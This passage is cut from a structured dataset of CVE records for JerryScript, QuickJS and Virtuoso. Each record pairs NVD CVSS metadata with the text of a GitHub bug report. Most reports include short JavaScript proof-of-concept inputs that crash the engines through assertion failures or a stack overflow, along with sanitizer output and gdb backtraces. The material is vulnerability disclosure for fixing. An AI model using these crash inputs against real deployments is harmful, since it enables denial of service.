#9 0x083a30d3 in parser_parse_class_body (context_p=<optimized out>, opts=<optimized out>, class_name_index=0)
at jerryscript/jerry-core/parser/js/js-parser-expr.c:908
#10 parser_parse_class (context_p=<optimized out>, is_statement=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser-expr.c:1110
#11 0x083c9959 in parser_parse_statements (context_p=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser-statm.c:2787
#12 0x08284a26 in parser_parse_source (source_p=0xffffd030, parse_opts=<optimized out>, options_p=0xffffd100)
at jerryscript/jerry-core/parser/js/js-parser.c:2280
#13 0x08282c70 in parser_parse_script (source_p=0xffffd030, parse_opts=0, options_p=0xffffd100) at jerryscript/jerry-core/parser/js/js-parser.c:3326
#14 0x08129a7d in jerry_parse_common (source_p=0xffffd030, options_p=<optimized out>, parse_opts=0) at jerryscript/jerry-core/api/jerryscript.c:412
#15 0x08129698 in jerry_parse (source_p=<optimized out>, source_size=<optimized out>, options_p=<optimized out>)
at jerryscript/jerry-core/api/jerryscript.c:480
#16 0x083ea952 in jerryx_source_parse_script (path_p=<optimized out>) at jerryscript/jerry-ext/util/sources.c:52
#17 0x083eac12 in jerryx_source_exec_script (path_p=0xffffd5e0 "poc.js") at jerryscript/jerry-ext/util/sources.c:63
#18 0x0812162d in main (argc=<optimized out>, argv=<optimized out>) at jerryscript/jerry-main/main-desktop.c:156
```
Credits:
@Ye0nny, @EJueon of the seclab-yonsei.
| Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5064/comments | 0 | 2023-04-06T14:02:51Z | 2023-04-06T14:02:51Z | https://github.com/jerryscript-project/jerryscript/issues/5064 | 1,657,488,796 | 5,064 | 5,121 |
CVE-2023-31919 | 2023-05-12T14:15:09.927 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the jcontext_raise_exception at jerry-core/jcontext/jcontext.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5069"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5069"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/jerryscript-project/jerryscript/issues/5069 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7)
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
```
###### Test case
``` JavaScript
// poc.js
var t = Function ( ) ;
t [ Symbol . species ] = Object ;
var e = new Proxy ( { constructor : t } , { set : function ( ) { } } ) ;
RegExp . prototype [ Symbol . matchAll ] . call ( e ) ;
```
###### Execution steps & Output
```sh
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion '!jcontext_has_pending_exception ()' failed at /jerryscript/jerry-core/jcontext/jcontext.c(jcontext_raise_exception):88.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted (core dumped)
```
###### Backtrace
```
(gdb) #0 0xf7f40d99 in __kernel_vsyscall ()
#1 0xf7c15276 in raise () from /lib32/libc.so.6
#2 0xf7bfd3f7 in abort () from /lib32/libc.so.6
#3 0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
at /jerryscript/jerry-port/common/jerry-port-process.c:29
#4 0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
at /jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x08260d64 in jerry_assert_fail (
assertion=0x8434bc0 <str> "!jcontext_has_pending_exception ()",
file=0x8434b00 <str> "/jerryscript/jerry-core/jcontext/jcontext.c",
function=0x8434c20 <__func__.jcontext_raise_exception> "jcontext_raise_exception", line=88)
at /jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6 0x0825e7b0 in jcontext_raise_exception (error=4115661203)
at /jerryscript/jerry-core/jcontext/jcontext.c:88
#7 0x081f52e5 in ecma_raise_standard_error (error_type=JERRY_ERROR_SYNTAX, [0/1762]
msg=ECMA_ERR_INVALID_REGEXP_FLAGS) at /jerryscript/jerry-core/ecma/operations/ecma-exceptions.c:315#8 0x081f5a91 in ecma_raise_syntax_error (msg=ECMA_ERR_INVALID_REGEXP_FLAGS)
at /jerryscript/jerry-core/ecma/operations/ecma-exceptions.c:456
#9 0x08234ac7 in ecma_regexp_parse_flags (flags_str_p=<optimized out>,
flags_p=<optimized out>)
at /jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:115
#10 0x0835e0d2 in ecma_builtin_regexp_prototype_match_all (
regexp_obj_p=0xffcd35c0, string_arg=<optimized out>)
at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:504
#11 ecma_builtin_regexp_prototype_dispatch_routine (
builtin_routine_id=<optimized out>, this_arg=<optimized out>,
arguments_list_p=<optimized out>, arguments_number=<optimized out>)
at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:598
#12 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>,
this_arg_value=<optimized out>, arguments_list_p=0xffcd3690,
arguments_list_len=<optimized out>)
at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#13 ecma_builtin_dispatch_call (obj_p=<optimized out>,
this_arg_value=<optimized out>, arguments_list_p=<optimized out>,
arguments_list_len=<optimized out>)
at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#14 0x081fb6b8 in ecma_op_function_call_native_built_in (
func_obj_p=0xf55004c0, this_arg_value=4115662259,
arguments_list_p=0xffcd38d4, arguments_list_len=0)
at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#15 0x081fa81d in ecma_op_function_call (func_obj_p=0xf55004c0,
this_arg_value=4115662259, arguments_list_p=0xffcd38d4,
arguments_list_len=0)
at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#16 0x0833172e in ecma_builtin_function_prototype_object_call (
func_obj_p=0xf55004c0, arguments_list_p=0xffcd38d0,
arguments_number=<optimized out>)
at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-function-prototype.c:288
#17 ecma_builtin_function_prototype_dispatch_routine (
builtin_routine_id=<optimized out>, this_arg=<optimized out>,
arguments_list_p=<optimized out>, arguments_number=<optimized out>)
at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-function-prototype.c:529
#18 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>,
this_arg_value=<optimized out>, arguments_list_p=0xffcd38d0,
arguments_list_len=<optimized out>)
at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#19 ecma_builtin_dispatch_call (obj_p=<optimized out>,
this_arg_value=<optimized out>, arguments_list_p=<optimized out>,
arguments_list_len=<optimized out>)
at /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#20 0x081fb6b8 in ecma_op_function_call_native_built_in (
func_obj_p=0xf5500460, this_arg_value=4115662019,
arguments_list_p=0xffcd3af4, arguments_list_len=1)
at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#21 0x081fa81d in ecma_op_function_call (func_obj_p=0xf5500460,
this_arg_value=4115662019, arguments_list_p=0xffcd3af4,
arguments_list_len=1)
at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#22 0x081fa5cf in ecma_op_function_validated_call (callee=4115661923,
this_arg_value=4115662019, arguments_list_p=0xffcd3af4,
arguments_list_len=1)
at /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
#23 0x082d7631 in opfunc_call (frame_ctx_p=<optimized out>)
at /jerryscript/jerry-core/vm/vm.c:758
#24 vm_execute (frame_ctx_p=0xffcd3ac0)
at /jerryscript/jerry-core/vm/vm.c:5217
#25 0x082d4f62 in vm_run (shared_p=0xffcd3bb0, this_binding_value=4119870595,
lex_env_p=0xf57007b0)
at /jerryscript/jerry-core/vm/vm.c:5312
#26 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>,
function_object_p=<optimized out>)
at /jerryscript/jerry-core/vm/vm.c:286
#27 0x0812a4e5 in jerry_run (script=4115663075)
at /jerryscript/jerry-core/api/jerryscript.c:548
#28 0x083eac3f in jerryx_source_exec_script (path_p=0xffcd5235 "test.js")
at /jerryscript/jerry-ext/util/sources.c:68
#29 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
at /jerryscript/jerry-main/main-desktop.c:156
(gdb) quit
```
credits: @EJueon, @Ye0nny of the seclab-yonsei. | Assertion '!jcontext_has_pending_exception ()' failed at /jerryscript/jerry-core/jcontext/jcontext.c(jcontext_raise_exception):88. | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5069/comments | 0 | 2023-04-16T13:13:26Z | 2024-11-22T09:21:07Z | https://github.com/jerryscript-project/jerryscript/issues/5069 | 1,669,965,859 | 5,069 | 5,122 |
CVE-2023-31920 | 2023-05-12T14:15:09.963 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the vm_loop at jerry-core/vm/vm.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5070"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5070"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/jerryscript-project/jerryscript/issues/5070 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7)
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
```
###### Test case
<details><summary>testcase</summary>
<p>
```JavaScript
class s { 0 = class { } ; [ 1 ] = class { constructor ( ) { } static name ( s ) { } } ; } new s ( ) ; gc ( ) ; new s ( ) ( e ) ; let t = 32 ;
```
</p>
</details>
``` JavaScript
// poc.js
class s { [ 1 ] = class { constructor ( ) { } static name ( s ) { } } ; }
new s ( ) ;
```
###### Execution steps & Output
```sh
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'ecma_find_named_property (func_obj_p, ecma_get_magic_string (LIT_MAGIC_STRING_NAME)) == NULL' failed at /jerryscript/jerry-core/vm/vm.c(vm_loop):2173.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted
```
credits: @EJueon, @Ye0nny of the seclab-yonsei. | Assertion 'ecma_find_named_property (func_obj_p, ecma_get_magic_string (LIT_MAGIC_STRING_NAME)) == NULL' failed at /jerryscript/jerry-core/vm/vm.c(vm_loop):2173. | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5070/comments | 0 | 2023-04-19T03:29:02Z | 2024-11-22T09:26:01Z | https://github.com/jerryscript-project/jerryscript/issues/5070 | 1,674,113,082 | 5,070 | 5,123 |
CVE-2023-31921 | 2023-05-12T14:15:10.007 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_big_uint_div_mod at jerry-core/ecma/operations/ecma-big-uint.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5068"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5068"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/jerryscript-project/jerryscript/issues/5068 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7)
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
```
###### Test case
``` JavaScript
// poc.js
var x = BigInt ( 8 ** 16 + 1 ) ;
x ** BigInt ( 4 ) / x;
```
###### Execution steps & Output
```sh
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma_big_uint_div_mod):1119.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted
```
###### Backtrace
```
(gdb) #0 0xf7efdd99 in __kernel_vsyscall ()
#1 0xf7bd2276 in raise () from /lib32/libc.so.6
#2 0xf7bba3f7 in abort () from /lib32/libc.so.6
#3 0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
at /jerryscript/jerry-port/common/jerry-port-process.c:29
#4 0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
at /jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x08260d64 in jerry_assert_fail (
assertion=0x846e200 <str> "dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high",
file=0x846d800 <str> "/jerryscript/jerry-core/ecma/operations/ecma-big-uint.c",
function=0x846e080 <__func__.ecma_big_uint_div_mod> "ecma_big_uint_div_mod", line=1119)
at /jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6 0x08380b54 in ecma_big_uint_div_mod (dividend_value_p=0xf4203c40,
divisor_value_p=0xf5600630, is_mod=<optimized out>)
at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c:1119
#7 0x081dfc96 in ecma_bigint_div_mod (left_value=4095753286,
right_value=4116710966, is_mod=<optimized out>)
at /jerryscript/jerry-core/ecma/operations/ecma-bigint.c:1337
#8 0x082be8b9 in do_number_arithmetic (op=<optimized out>,
left_value=<optimized out>, right_value=<optimized out>)
at /jerryscript/jerry-core/vm/opcodes-ecma-arithmetics.c:148
#9 0x082dd6f0 in vm_loop (frame_ctx_p=0xffdc12c0)
at /jerryscript/jerry-core/vm/vm.c:3563
#10 0x082d6b83 in vm_execute (frame_ctx_p=0xffdc12c0)
at /jerryscript/jerry-core/vm/vm.c:5211
#11 0x082d4f62 in vm_run (shared_p=0xffdc13d0, this_binding_value=4118822019,
lex_env_p=0xf56007b0)
at /jerryscript/jerry-core/vm/vm.c:5312
#12 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>,
function_object_p=<optimized out>)
at /jerryscript/jerry-core/vm/vm.c:286
#13 0x0812a4e5 in jerry_run (script=4114614595)
at /jerryscript/jerry-core/api/jerryscript.c:548
#14 0x083eac3f in jerryx_source_exec_script (
path_p=0xffdc21e7 "poc.js")
at /jerryscript/jerry-ext/util/sources.c:68
#15 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
at /jerryscript/jerry-main/main-desktop.c:156
(gdb) quit
```
credits: @EJueon, @Ye0nny of the seclab-yonsei. | Assertion 'dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma_big_uint_div_mod) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5068/comments | 0 | 2023-04-08T14:19:33Z | 2024-11-22T09:20:07Z | https://github.com/jerryscript-project/jerryscript/issues/5068 | 1,659,537,585 | 5,068 | 5,124 |
CVE-2023-31922 | 2023-05-12T14:15:10.043 | QuickJS commit 2788d71 was discovered to contain a stack-overflow via the component js_proxy_isArray at quickjs.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/bellard/quickjs/issues/178"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/bellard/quickjs/issues/178"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:quickjs_project:quickjs:2022-03-06:*:*:*:*:*:*:*",
"matchCriteriaId": "99632CE3-97CF-4901-BADD-4E8A8A659528",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/bellard/quickjs/issues/178 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"bellard",
"quickjs"
] | QuickJS Version
---
Version : https://github.com/bellard/quickjs/commit/2788d71e823b522b178db3b3660ce93689534e6d
platform
---
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build
---
- Address Sanitizer=On
- Debug (and Release)
PoC
---
<details><summary>testcase</summary>
<p>
```javascript
Array . isArray ( [ ] ) ; Array . isArray ( { } ) , Array . isArray ( null ) , Array . isArray ( 0 ) , Array . isArray ( 0.1 ) , Array . isArray ( " " ) , Array . isArray ( void 0 ) , Array . isArray ( new Proxy ( [ ] , { } ) ) , Array . isArray ( new Proxy ( { } , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( [ ] , { } ) , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( { } , { } ) , { } ) ) ; for ( var r = new Proxy ( [ ] , { } ) , y = 0 ; y < 131072 ; y ++ ) r = new Proxy ( r , { } ) ; Array . isArray ( r ) , RangeError ;
```
</p>
</details>
```javascript
// poc.js
for (var r = new Proxy ([],{}) , y = 0 ; y < 131072 ; y ++ )
r = new Proxy (r, {});
Array . isArray (r);
```
Execution steps & Output
---
The js_proxy_isArray() function and the JS_IsArray() function are calling each other recursively.
infinite loop occurs here.
```
$ ./qjs poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2347865==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcfb766fd8 (pc 0x557e466f5b94 bp 0x7ffcfb767110 sp 0x7ffcfb766fd8 T0)
#0 0x557e466f5b93 in js_proxy_isArray ./quickjs/quickjs.c:45242
#1 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
#2 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
#3 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
#4 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
#5 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
...
#491 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
#492 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
#493 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
#494 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
#495 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
#496 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
SUMMARY: AddressSanitizer: stack-overflow ./quickjs/quickjs.c:45242 in js_proxy_isArray
==2347865==ABORTING
```
Credits: @Ye0nny, @EJueon of the seclab-yonsei.
| AddressSanitizer: stack-overflow | https://api.github.com/repos/bellard/quickjs/issues/178/comments | 2 | 2023-04-22T08:59:26Z | 2023-12-01T17:15:15Z | https://github.com/bellard/quickjs/issues/178 | 1,679,428,623 | 178 | 5,125 |
CVE-2023-31607 | 2023-05-15T15:15:11.573 | An issue in the __libc_malloc component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1120"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1120"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1120 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1(x VARCHAR, k VARCHAR);
